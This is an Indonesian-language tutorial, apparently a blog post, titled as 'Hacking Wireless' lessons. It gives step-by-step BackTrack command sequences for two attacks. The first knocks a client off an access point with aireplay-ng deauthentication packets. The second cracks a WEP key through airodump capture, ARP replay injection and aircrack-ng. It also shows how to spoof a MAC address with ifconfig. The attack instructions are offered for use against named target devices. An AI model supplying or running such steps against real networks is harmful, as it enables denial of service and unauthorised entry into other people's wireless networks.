*Perintah ifconfig
#ifconfig [interface] up (mengaktifkan kartu jaringan)
#ifconfig [interface] down (menonaktifkan kartu jaringan)
#
ifconfig [interface] [IP address] netmask [subnet-mask] (menset IP address dan subnet mask scr manual)
#
ifconfig [interface] hw ether [MAC] (Merubah MAC address kartu PCMCIA dalam format 11:11:11:11:11:11)
Hacking Wireless III : Melumpuhkan Client yang terhubung pada suatu AP:
Melumpuhkan Client yang terhubung pada suatu AP:
Jalankan Live CD LinuxBackTrack 2.
Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.
Tutup Kismet, lalu buka console, ketikkan:
#airmon-ng stop ath0
#airmon-ng stop ath1
#airmon-ng start wifi0
Jalankan scanning wireless menggunakan Airodump :
#airodump-ng ath0
Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:
#ifconfig ath0 up
#iwconfig ath0 mode monitor channel 11
Langkah terakhir, kita lakukan serangan, ketikkan:
#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
Aireplay-ng -> program yang digunakan untuk melakukan de authentication
--deauth -> option untuk serangan de authentication
20 -> jumlah sending packet
00:0E:2E:C1:1E:83 -> MAC-Address komputer target
-a -> option untuk Access Point
00:0E:2E:C2:2C:0E -> MAC-Address Access Point
ath0 -> interface yang digunakan untuk menyerang
Hacking Wireless II: Menembus Pertahanan WEP Keys
Menembus Pertahanan WEP Keys:
Jalankan BackTrack.
Reset driver wireless. Ketikkan:
#airmon-ng
#airmon-ng stop ath0
#airmon-ng stop ath1
Buka 3 buah console.
Console 1, ketikkan:
#airodump-ng ath0
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0
Keterangan:
Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE
P Key.
--bssid -> MAC-Address dari AP yang akan di crack
-w target -> hasil capture ini akan disimpan di file yang namanya target
Console 2, ketikkan:
Untuk membantu menciptakan pengumpulan paket data
#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0
Keterangan:
-b -> MAC-Address dari AP.
-h -> MAC-Address dari client yang aktif terhubung ke AP.
Console 3, ketikkan:
Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.
#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
-c -> MAC-Address dari Client
-a -> MAC-Address dari AP
Setelah terkumpul paket data yang cukup, dilakukan cracking:
#aircrack-ng target*.cap
Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.